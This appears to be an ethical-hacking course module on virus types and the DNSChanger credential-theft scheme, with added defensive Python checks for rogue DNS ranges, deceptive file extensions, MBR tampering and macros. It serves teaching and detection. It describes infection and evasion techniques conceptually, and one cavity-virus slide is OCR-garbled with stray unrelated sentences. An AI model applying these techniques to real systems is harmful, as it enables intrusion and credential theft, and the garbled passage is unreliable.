To infect the system and steal credentials, the attacker first has to run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing its DNS IP address to 64.28.176.2. Once this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After the DNS setting is altered, any request made by the system is sent to the malicious DNS server. Here, the victim sends the DNS request "What is the IP address of www.xsecurity.com?" to 64.28.176.2. The attacker responds that www.xsecurity.com is located at 65.0.0.2. When the victim's browser connects to 65.0.0.2, it reaches a fake website created by the attacker at IP 65.0.0.2.
DNSChanger sniffs the credentials (user name, passwords) and redirects the request to the real website (www.xsecurity.com) at IP 200.0.0.45.
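The rogue ranges listed on the previous slide and the NameServer registry value described above are what an incident responder checks on a suspected host. The following is an added example, not code from the module or from Total Defense: it tests resolver addresses against the six published ranges and scans a constructed set of per-interface NameServer values (the interface GUIDs are placeholders, and 192.0.2.x addresses are from the RFC 5737 documentation range). Reading the real values from the registry is left to the reader's tooling; the check itself is the point.

```python
import ipaddress

# Rogue DNS server ranges exactly as listed in the module (start and end inclusive).
ROGUE_DNS_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Pre-compute integer bounds once so that each lookup is a simple comparison.
_BOUNDS = [
    (int(ipaddress.IPv4Address(lo)), int(ipaddress.IPv4Address(hi)))
    for lo, hi in ROGUE_DNS_RANGES
]


def is_rogue_dns(server: str) -> bool:
    """True if the IPv4 address lies inside one of the listed rogue ranges."""
    try:
        n = int(ipaddress.IPv4Address(server.strip()))
    except ipaddress.AddressValueError:
        return False  # empty or malformed value: not an IPv4 literal
    return any(lo <= n <= hi for lo, hi in _BOUNDS)


def flag_nameserver_value(value: str) -> list:
    """Split a NameServer registry value (comma- or space-separated list)
    and return the entries that fall inside a rogue range."""
    servers = value.replace(",", " ").split()
    return [s for s in servers if is_rogue_dns(s)]


# Constructed sample: two interface entries as they would appear under
# ...\Tcpip\Parameters\Interfaces\<CLSID>\NameServer. The GUID keys are
# placeholders for the random CLSID the slide refers to.
SAMPLE_INTERFACES = {
    "{IFACE-GUID-1}": "192.0.2.1,192.0.2.2",
    "{IFACE-GUID-2}": "64.28.176.2",
}


def scan_interfaces(interfaces: dict) -> dict:
    """Map each interface key to the rogue resolvers configured on it;
    interfaces with no rogue entries are omitted from the result."""
    findings = {}
    for key, value in interfaces.items():
        hits = flag_nameserver_value(value)
        if hits:
            findings[key] = hits
    return findings


if __name__ == "__main__":
    for key, hits in scan_interfaces(SAMPLE_INTERFACES).items():
        print(f"{key}: rogue DNS server(s) {hits}")
```

A hit on an interface is the indicator; the remediation the module describes (the FBI-operated replacement servers) only kept resolution working, so an infected host still needs its NameServer value restored and the malware removed.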
• 28. Module Flow
So far we have discussed viruses and worms. Now we will discuss the different types of viruses. The module sections are: Virus and Worms Concepts, Types of Viruses, Computer Worms, Malware Analysis, Countermeasures, and Penetration Testing. This section describes the different types of viruses.
• 29. Types of Viruses
System or Boot Sector Viruses; Stealth Virus/Tunneling Virus; Cluster Viruses; Encryption; Polymorphic; Metamorphic; Sparse Infector Virus; Direct Action or Transient; Multipartite.
So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses. This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on.
Computer viruses are malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.
Viruses are classified according to two categories:
What do they infect?
How do they infect?
• 30. What Do They Infect?
System or Boot Sector Viruses: The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. These viruses specifically infect the floppy boot sectors and the records of the hard disk. Examples: Disk Killer and the Stone virus.
File Viruses: Executable files are infected by file viruses, which insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.
Multipartite Virus: They infect program files, and this file in turn affects the boot sectors; examples include Invader, Flip, and Tequila.
Cluster Viruses: Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.
Macro Virus: Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else happens. Macro viruses are somewhat less harmful than other types. They are usually spread via email.
How Do They Infect?
Stealth Viruses: These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations through these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.
Tunneling Viruses: These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.
• 31. Encryption Viruses: This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption.
Polymorphic Viruses: These viruses were developed to confuse antivirus programs that scan for viruses in the system. It is difficult to trace them, since they change their characteristics each time they infect, i.e., every copy of this virus differs from its previous one. Virus developers have even created metamorphic engines and virus writing toolkits that make the code of an existing virus look different from others of its kind.
Metamorphic Viruses: Code that can reprogram itself is called metamorphic code. This code is translated into temporary code and then converted back to normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. It is more effective than polymorphic code. This type of virus consists of complex, extensive code.
Overwriting File or Cavity Viruses: Some program files have areas of empty space. This empty space is the main target of these viruses.
The cavity virus, also known as the space filler virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.
Sparse Infector Viruses: A sparse infector virus infects only occasionally (e.g., every tenth program executed) or only files whose lengths fall within a narrow range.
Companion Viruses: The companion virus stores itself by having the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified.
Camouflage Viruses: They disguise themselves as genuine applications of the user. These viruses are not difficult to find, since antivirus programs have advanced to the point where such viruses are easily traced.
Shell Viruses: This virus code forms a layer around the target host program's code that can be compared to an "eggshell", making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.
File Extension Viruses: File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.
Add-on Viruses: Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.
Intrusive Viruses: This form of virus overwrites its code either by completely removing the target host's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.
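The BAD.TXT.VBS case above is easy to check for mechanically at a mail gateway or in an attachment log. The following is an added example, not code from the module: it reproduces what the user sees when the last extension is hidden, and flags names whose real extension is executable while the visible one looks like a data file. The two extension sets are assumptions of this example (a well-known subset, not an exhaustive list), and the sample file names are constructed.

```python
import os

# Extensions Windows executes directly or hands to a script host
# (a well-known subset chosen for this example, not an exhaustive list).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs",
                   ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1"}

# Extensions a user reads as harmless data.
DECOY_EXTS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".jpeg", ".png",
              ".xls", ".xlsx", ".rtf"}


def extensions(filename: str) -> list:
    """All dotted suffixes of the base name, lower-cased:
    'BAD.TXT.VBS' -> ['.txt', '.vbs']."""
    base = os.path.basename(filename)
    parts = base.split(".")
    return ["." + p.lower() for p in parts[1:]]


def displayed_name(filename: str) -> str:
    """What the user sees with file extensions hidden: the final
    extension is dropped, so 'BAD.TXT.VBS' shows as 'BAD.TXT'."""
    base = os.path.basename(filename)
    stem, _ext = os.path.splitext(base)
    return stem


def looks_deceptive(filename: str) -> bool:
    """True when the real (last) extension is executable but the one left
    visible after hiding it is a data-file extension."""
    exts = extensions(filename)
    if len(exts) < 2:
        return False
    return exts[-1] in EXECUTABLE_EXTS and exts[-2] in DECOY_EXTS


# Constructed sample of attachment names, as might appear in a gateway log.
SAMPLE_NAMES = ["BAD.TXT.VBS", "report.pdf.exe", "notes.txt",
                "setup.exe", "photo.JPG.scr", "archive.tar.gz"]


def flag_attachments(names) -> list:
    """Return the names that use the double-extension trick."""
    return [n for n in names if looks_deceptive(n)]


if __name__ == "__main__":
    for name in flag_attachments(SAMPLE_NAMES):
        print(f"{name!r} would be shown as {displayed_name(name)!r}")
```

Note that setup.exe is not flagged: a plain executable is not deceptive, only one that hides behind a data-file extension. The check is one layer; turning file-extension display on, as the text implies, removes the illusion for the user as well.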
Direct Action or Transient Viruses: This virus transfers all control to the host code where it resides, selects the target program to be modified, and corrupts it.
Terminate and Stay Resident Viruses (TSRs): A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.
• 33. System or Boot Sector Viruses
Boot Sector Virus: A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.
Execution: When the system boots, the virus code is executed first and then control is passed to the original MBR.
System sector viruses can be defined as those that affect the executable code of the disk, rather than the boot sector virus that affects the DOS boot sector of the disk. Any system is divided into areas, called sectors, where the programs are stored. The two types of system sectors are:
MBR (Master Boot Record): MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost.
DBR (DOS Boot Record): The DOS boot sector is executed whenever the system is booted. This is the crucial point of attack for viruses.
The system sector consists of 512 bytes of memory. Because of this, system sector viruses conceal their code in some other disk space. The main carrier of system sector viruses is the floppy disk. These viruses generally reside in memory. They can also be caused by Trojans. Some sector viruses also spread through infected files, and they are called multipart viruses.
• 34. Virus Removal
System sector viruses are designed to create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows operating system and switch to Linux or Macs, because Windows is more prone to these attacks. Linux and Macintosh have a built-in safeguard to protect against these viruses. The other way is to carry out antivirus checks on a periodic basis.
FIGURE 7.6: System or Boot Sector Viruses (before infection: the MBR; after infection: the virus code in its place)
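The text above says the system sector is 512 bytes and that a boot sector virus replaces the MBR with its own code while the original is moved aside. A practical periodic check is therefore to read the first sector and compare its bootstrap code against a baseline taken from a known-clean machine. The following is an added example, not code from the module: it assumes the standard MBR layout (446 bytes of bootstrap code, four 16-byte partition entries, and the 0x55AA signature), which the module does not spell out, and it builds two constructed 512-byte sectors rather than reading a disk. The point it makes is that the signature and partition table stay valid after an infection, so only a hash of the code region catches the swap.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOTSTRAP_SIZE = 446                 # bootstrap code occupies bytes 0..445
PART_TABLE_OFF = 446                 # four 16-byte partition entries follow
PART_ENTRY = struct.Struct("<B3sB3sII")  # status, CHS start, type, CHS end, LBA start, sector count
SIGNATURE = b"\x55\xaa"              # bytes 510..511


def parse_mbr(sector: bytes) -> dict:
    """Parse one 512-byte sector into signature state, a hash of the
    bootstrap code, and the non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, _chs1, ptype, _chs2, lba, count = PART_ENTRY.unpack_from(
            sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "signature_ok": sector[510:512] == SIGNATURE,
        "bootstrap_sha256": hashlib.sha256(sector[:BOOTSTRAP_SIZE]).hexdigest(),
        "partitions": partitions,
    }


def bootstrap_changed(sector: bytes, baseline_sha256: str) -> bool:
    """True when the code region differs from the recorded clean baseline."""
    return parse_mbr(sector)["bootstrap_sha256"] != baseline_sha256


def make_sample_mbr(bootstrap: bytes) -> bytes:
    """Constructed sector for the demo: given code bytes padded to 446,
    one bootable NTFS-type partition at LBA 2048, unused entries, signature."""
    code = bootstrap.ljust(BOOTSTRAP_SIZE, b"\x00")[:BOOTSTRAP_SIZE]
    table = PART_ENTRY.pack(0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00", 2048, 1_000_000)
    table += b"\x00" * 48
    return code + table + SIGNATURE


# Constructed stand-in for a legitimate loader's first bytes (clean baseline).
CLEAN_MBR = make_sample_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c")
BASELINE_SHA256 = parse_mbr(CLEAN_MBR)["bootstrap_sha256"]

# Constructed "after infection" sector: different code in the bootstrap
# region, partition table and signature untouched (the slide's scenario).
TAMPERED_MBR = make_sample_mbr(b"\xeb\xfe" + b"\x90" * 20)


if __name__ == "__main__":
    for label, sector in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR)):
        info = parse_mbr(sector)
        print(label, "signature_ok:", info["signature_ok"],
              "changed:", bootstrap_changed(sector, BASELINE_SHA256))
```

On a live system the baseline must be recorded while the machine is known clean and stored off the host, since the text's own point about stealth viruses is that an infected system may not return the real sector contents when asked.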
• 35. File and Multipartite Viruses
File Viruses: File viruses infect files that are executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses mainly target a range of operating systems that include Windows, UNIX, DOS, and Macintosh.
Characterizing File Viruses: File viruses are mainly characterized and described based on their physical behavior or characteristics. One way to classify a file virus is by the type of file it targets, such as EXE or COM files, the boot sector, etc. A file virus can also be characterized based on how it infects the targeted file (also known as the host file):
Prepending: writes itself into the beginning of the host file's code
Appending: writes itself to the end of the host file
Overwriting: overwrites the host file's code with its own code
Inserting: inserts itself into gaps inside the host file's code
• 36. Companion: renames the original file and writes itself under the host file's name
Cavity infector: writes itself between the file sections of a 32-bit file
File viruses are also classified based on whether they are non-memory resident or memory resident. Non-memory resident viruses search for EXE files on a hard drive and then infect them, whereas memory resident viruses stay actively in memory and trap one or more system functions.
File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. The main virus code is decrypted by the decryptor before it starts. An encrypted virus usually uses variable- or fixed-key decryptors, whereas polymorphic viruses have decryptors that are randomly generated from processor instructions and that consist of a lot of commands that are not used in the decryption process.
Execution of Payload:
Time bomb: after a specified period of time
Direct action: immediately upon execution
Condition triggered: only under certain conditions
Multipartite Viruses: A multipartite virus, also known as a multi-part virus, attempts to attack both the boot sector and the executable or program files at the same time. When the virus is attached to the boot sector, it will in turn affect the system files, and then the virus attaches to the files, and this time it will in turn infect the boot sector.
FIGURE 7.7: File and Multipartite Viruses
• 37. Macro Viruses
Macro viruses infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Most macro viruses are written using the macro language Visual Basic for Applications (VBA). (Figure: the attacker infects macro-enabled documents, which reach the user.)
Microsoft Word or similar applications can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else happens. Most macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Macro viruses are somewhat less harmful than other types. They are usually spread via email. Pure data files do not allow the spread of viruses, but sometimes the line between a data file and an executable file is easily overlooked by the average user due to the extensive macro languages in some programs.
In most cases, just to make things easy for users, the line between a data file and a program starts to blur in cases where the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit common programs with macro capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code. In addition, the latest exploited macro code exists in the full version of the Acrobat program that reads and writes PDF files.
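Because the text's point is that a macro-carrying document looks like an ordinary data file, a gateway or triage script should look inside the file rather than trust its extension. The following is an added example, not code from the module: it assumes the Office Open XML packaging (a ZIP archive in which a VBA project is stored as a vbaProject.bin part, under word/, xl/ or ppt/), builds two constructed minimal packages in memory, and reports whether a document carries macros and whether that matches what its extension claims. The vbaProject.bin content here is a placeholder, not a real VBA project.

```python
import io
import os
import zipfile

# Extensions whose OOXML package is expected to be allowed to carry a VBA project.
MACRO_ENABLED_EXTS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam",
                      ".pptm", ".potm", ".ppam"}


def build_sample_document(with_macros: bool) -> bytes:
    """Constructed minimal Word OOXML package for the demo (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # A real vbaProject.bin is an OLE compound file; this is only a placeholder.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")
    return buf.getvalue()


def inspect_document(filename: str, data: bytes) -> dict:
    """Report whether an Office file carries a VBA project part and whether
    its extension is one that advertises macros."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        # Legacy binary .doc/.xls (OLE) or not an Office file: a different parser is needed.
        return {"ooxml": False, "has_macros": None,
                "macro_parts": [], "extension_mismatch": None}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
    parts = sorted(n for n in names if n.lower().endswith("vbaproject.bin"))
    ext = os.path.splitext(filename)[1].lower()
    return {
        "ooxml": True,
        "has_macros": bool(parts),
        "macro_parts": parts,
        # A macro part inside a file whose extension promises "no macros"
        # is worth a closer look regardless of how the application treats it.
        "extension_mismatch": bool(parts) and ext not in MACRO_ENABLED_EXTS,
    }


# Constructed samples: a plain document, a macro-enabled one, and a
# macro-carrying package renamed to look like a plain .docx.
SAMPLES = {
    "memo.docx": build_sample_document(with_macros=False),
    "invoice.docm": build_sample_document(with_macros=True),
    "renamed.docx": build_sample_document(with_macros=True),
}


def triage(samples: dict) -> list:
    """Names of samples that carry macros, for quarantine or manual review."""
    return [name for name, data in samples.items()
            if inspect_document(name, data)["has_macros"]]


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, inspect_document(name, data))
```

Detecting the presence of a VBA project is the cheap first gate; whether the macros auto-run on open (the Auto-open behavior the text describes) requires decompressing and reading the project itself, which is a separate step.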
• 38. FIGURE 7.8: Macro Viruses (the attacker infects macro-enabled documents, which reach the user)
• 39. Cluster Viruses
Cluster viruses modify directory table entries so that they point users or system processes to the virus code instead of the actual program.
Virus copy: There is only one copy of the virus on the disk, infecting all the programs in the computer system.
Launch itself: It will launch itself first when any program on the computer system is started, and then control is passed to the actual program.
Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program. When a program is run under DOS, DOS first loads and executes the virus code, and then the virus locates the actual program and executes it. Dir-2 is an example of this type of virus. Cluster viruses modify directory table entries so that directory entries point to the virus code. There is only one copy of the virus on the disk, infecting all the programs in the computer system. It will launch itself first when any program on the computer system is started, and then control is passed to the actual program.
• 40. Stealth/Tunneling Viruses
These viruses evade antivirus software by intercepting its requests to the operating system. A virus can hide itself by intercepting the antivirus software's request to read the file and passing the request to the virus instead of the OS. The virus can then return an uninfected version of the file to the antivirus software, so that it appears as if the file is "clean".
Stealth Viruses: These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations through these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. The stealth virus hides itself from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other drive of the system, thus replacing the infected file with the uninfected file that is stored on the hard drive.
A stealth virus hides the modifications that it makes. It takes control of the system's functions that read files or system sectors and, when another program requests information that has already been modified by the virus, the stealth virus reports the unmodified information to the requesting program instead. This virus also resides in memory. To avoid detection, these viruses always take over system functions and use them to hide their presence.
• 41. One of the carriers of the stealth virus is the rootkit. Installing a rootkit generally results in this virus attack because rootkits are installed via Trojans, and thus are capable of hiding any malware.
Removal:
Always do a cold boot (boot from a write-protected floppy disk or CD)
Never use DOS commands such as FDISK to fix the virus
Use antivirus software
Tunneling Viruses: These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.
FIGURE 7.9: Working of Stealth/Tunneling Viruses (the antivirus software asks "Give me the system file tcpip.sys to scan"; the virus hides the infected TCPIP.SYS and answers "Here you go" with the original TCPIP.SYS)
Encryption Viruses

This type of virus uses simple encryption to encipher its code. The virus is encrypted with a different key for each infected file, so an AV scanner cannot directly detect these viruses using signature detection methods.

An encryption virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption. These viruses generally employ XOR on each byte with a randomized key.

- The virus is made up of a decryption module and an encrypted copy of the code, enciphered under an encryption key.
- For each infected file, the virus is encrypted by using a different combination of keys, but the decrypting module remains unchanged. It is not possible for the virus scanner to directly detect the virus by means of signatures, but the decrypting module can be detected.
- The decryption technique employed is XOR of each byte with a randomized key that is generated and saved by the root virus.
FIGURE 7.10: Working of Encryption Viruses (one virus code enciphered into Encryption Virus 1, 2 and 3, each under a different key)
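The scanner-side consequence of the design above, as an added example that is not part of the source: two constructed byte strings stand in for the constant decryptor and the body, a single-byte XOR key is assumed as the text describes, and three detection strategies are compared (a signature on the body, a signature on the unchanged decryptor, and trying all 255 keys, which is feasible precisely because the key space is that small).

```python
# Constructed placeholders for the two parts the text describes. Neither is executable
# code; they are byte strings chosen so the scanner behaviour can be shown.
DECRYPTOR_STUB = b"STUB:load-key;loop:xor-byte;jmp-body;"   # constant across infections
VIRUS_BODY = b"CONSTRUCTED-PAYLOAD-BODY-marker-0001"        # what the per-file key hides


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one single-byte key; the same call decrypts."""
    return bytes(b ^ key for b in data)


def make_sample(key: int) -> bytes:
    """One 'infected file' as the text describes it: the unchanged decryptor followed by
    the body enciphered under this file's key (assumption: a single-byte key)."""
    if not 1 <= key <= 255:
        raise ValueError("single-byte key required, and key 0 would leave the body in clear")
    return DECRYPTOR_STUB + xor_bytes(VIRUS_BODY, key)


def plain_signature_hits(sample: bytes, signature: bytes) -> bool:
    """Classic signature scan: does this byte pattern occur literally in the file?"""
    return signature in sample


def xray_key(sample: bytes, plaintext_sig: bytes, stub_len: int = len(DECRYPTOR_STUB)):
    """Scanner-side 'X-raying': with only 255 possible keys, try each one on the part
    after the decryptor and return the key under which the plaintext signature appears."""
    enciphered = sample[stub_len:]
    for key in range(1, 256):
        if plaintext_sig in xor_bytes(enciphered, key):
            return key
    return None


def compare_scanners(keys):
    """Run the three strategies over one sample per key and report the hits."""
    samples = [make_sample(k) for k in keys]
    body_sig = VIRUS_BODY[:12]          # signature taken from the decrypted body
    stub_sig = DECRYPTOR_STUB[:16]      # signature taken from the constant decryptor
    return {
        "body_signature_hits": sum(plain_signature_hits(s, body_sig) for s in samples),
        "stub_signature_hits": sum(plain_signature_hits(s, stub_sig) for s in samples),
        "xray_recovered_keys": [xray_key(s, body_sig) for s in samples],
    }


if __name__ == "__main__":
    # Three infections under three keys: the body signature never matches, the
    # decryptor signature always does, and X-raying recovers every key.
    print(compare_scanners([0x5A, 0xC3, 0x17]))
```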
Polymorphic Code

Polymorphic code is code that mutates while keeping the original algorithm intact. To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine). A well-written polymorphic virus therefore has no parts that stay the same on each infection.

Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. A random number generator is used for implementing polymorphism. A mutation engine is generally used to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic codes are used to prevent antivirus professionals from accessing the codes. Virus samples, which are bait files infected after a single execution, contain a similar copy of the virus. A simple integrity checker is used to detect the presence of a polymorphic virus on the system's disk.
FIGURE 7.11: How Polymorphic Code Works (Encrypted Mutation Engine (EME), Encrypted Virus Code and Decryptor Routine; the user runs an infected program, the decryptor routine decrypts the virus code and mutation engine in RAM, a new polymorphic virus is produced, and the virus does the damage)

Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code; it decrypts the code only after taking control of the computer. The mutation engine generates randomized decryption routines. This decryption routine varies every time a new program is infected by the virus. With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a program that is infected with a polymorphic virus is run by the user, the decryptor routine takes complete control over the system, after which it decrypts the virus code and the mutation engine. Next, control of the system is transferred by the decryption routine to the virus, which locates a new program to infect. In RAM (Random Access Memory), the virus makes a replica of itself as well as of the mutation engine.

Then the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which has the capability of decrypting the virus. This new copy of both the virus code and the mutation engine is then encrypted by the virus. Thus, the virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends this new decryption routine onto a new program, thereby continuing the process. Polymorphic viruses that are spread by the attacker in targeted systems are difficult to detect because the virus body is encrypted and the decryption routine changes from infection to infection, so no two infections look the same; this makes it difficult for the virus scanner to identify the virus.
Metamorphic Viruses

Metamorphic viruses rewrite themselves completely each time they are to infect a new executable. Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again. For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the metamorphic engine.

Some viruses rewrite themselves to infect newly executed files. Such viruses are complex and use metamorphic engines for execution. Code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. It is more effective in comparison to polymorphic code. This type of virus consists of complex, extensive code.
The commonly known metamorphic viruses are:

Win32/Simile: This virus is written in assembly language and destined for Microsoft Windows. This process is complex, and nearly 90% of the virus code is generated by this process.

Zmist: Zmist is also known as Zombie.Mistfall. It is the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.
FIGURE 7.12: Metamorphic Viruses Screenshot (a.) Variant A; b.) Variant B; c.) the "unofficial" Variant C; d.) the .D variant, which was the "official" C of the original author)
  • 48. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker File Overwriting or Cavity Viruses CEH Cavity Virus overwrites a part of the host file with a constant (usually nulls), without increasingthe length of the file and preserving its functionality Sales and marketing management is the leading authority for executives in the sales and marketing management industries The suspect, Desmond Turner, surrendered to authorities at a downtown Indianapolis fast-food restaurant Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Original File Size: 45 KB Null Null N U ll Null Null Null Null Null ■2> a ■ 3 Null Infected File Size: 45 KB Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. F ile O v e r w r itin g o r C a v ity V iru s e s T h e s e are also k n o w n as s p a c e -fille r s since t h e y m a i n t a i n a c o n s t a n t file -s iz e w h i l e i n f e c t e d b y in s t a llin g t h e m s e l v e s i n t o t h e t a r g e t p r o g r a m . T h e y a p p e n d t h e m s e l v e s t o t h e e n d o f file s a n d also c o r r u p t t h e s t a r t o f files. T his t r i g g e r e v e n t f i r s t a c tiv a te s a n d e x e c u te s t h e v iru s c o d e , a n d l a t e r t h e o rig in a l a p p li c a t i o n p r o g r a m . S o m e p r o g r a m file s h a ve a re a s o f e m p t y sp ace . T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e v iru s e s . T h e C a v it y V ir u s , a lso k n o w n as t h e Space F ille r V iru s , s to re s its c o d e in t h is e m p t y space. T h e v iru s in s ta lls it s e lf in t h i s u n o c c u p ie d space w i t h o u t a n y d e s t r u c t i o n t o t h e o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in fe c t. 
T his t y p e o f v ir u s is r a r e ly used b e c a u s e it is d i f f i c u l t t o w r i t e . A n e w W i n d o w s file ca lle d th e P o r t a b l e E x e c u t a b le it d e s ig n e d f o r t h e fa s t lo a d in g o f p r o g r a m s . H o w e v e r , it lea ves a c e r ta in g ap in t h e f ile w h i l e it is b e in g e x e c u t e d t h a t can be used by t h e Space F ille r V ir u s t o i n s e r t its e lf. T h e m o s t p o p u l a r v ir u s f a m i l y is t h e CIH v ir u s . Original File Size: 45 KB I h .............................................................................^ PDF L >1 Infected File Size: 45 KB PDF FIGURE 7 .1 3 : File O v e r w ritin g o r C a v ity V iru s M odule 07 Page 1053 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
Sparse Infector Viruses

Sparse infector viruses infect only occasionally (e.g., every tenth program executed, or on a particular day of the week) or only files whose lengths fall within a narrow range. By infecting less often, these viruses try to minimize the probability of being discovered, which makes them difficult to detect.

FIGURE 7.14: Working of Sparse Infector Viruses (infection process: wake up on the 15th of every month and execute code)
Companion/Camouflage Viruses

A companion virus creates a companion file for each executable file the virus infects. Therefore, a companion virus may save itself as notepad.com and every time a user executes notepad.exe (the good program), the computer will load notepad.com (the virus) and infect the system.

Companion Viruses

The companion virus stores itself under the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified. Companion viruses exploit the fact that DOS runs COM files before EXE files of the same name. The virus installs an identically named COM file and so infects the EXE files.

Source: http://www.cknow.com/vtutor/CompanionViruses.html

